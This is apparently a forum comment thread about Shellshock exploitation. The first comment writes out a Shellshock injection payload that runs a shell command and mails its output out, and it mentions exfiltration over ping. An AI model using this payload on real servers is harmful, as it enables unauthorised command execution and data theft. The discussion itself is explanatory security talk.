Yeah I saw some people mail themselves the content of these two files with either mail like this:
() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' [email protected] obviously the command had to be adapted a bit and you had to have a few things setup in a certain way for this to work. I also saw some more creative data exfiltration methods mentioned here: ~~~ embed:AskNetsec/comments/39a8my/how_to_exploit_shellshock_with_only_ping/ such as using ping :) reddit metadata:fEFza05ldHNlY3xodHRwczovL3d3dy5yZWRkaXQuY29tL3IvQXNrTmV0c2VjL2NvbW1lbnRzLzM5YThteS9ob3dfdG9fZXhwbG9pdF9zaGVsbHNob2NrX3dpdGhfb25seV9waW5nLyBzdWNoIGFzIHVzaW5nIHBpbmcgOil8 ~~~
Thanks for interesting post. Will be following you. I'm gonna post this on reddit.com/r/linux_mentor.
https://blog.cloudflare.com/inside-shellshock/
You are viewing a single comment's thread from:
There is always a way for those who are persistent in finding ways to penetrate a system. The
shellshockcase also shows how vulnerabilities can be exploited for negative things. Thanks for sharing full of information's link about Pentesting. Two thumbs up for you.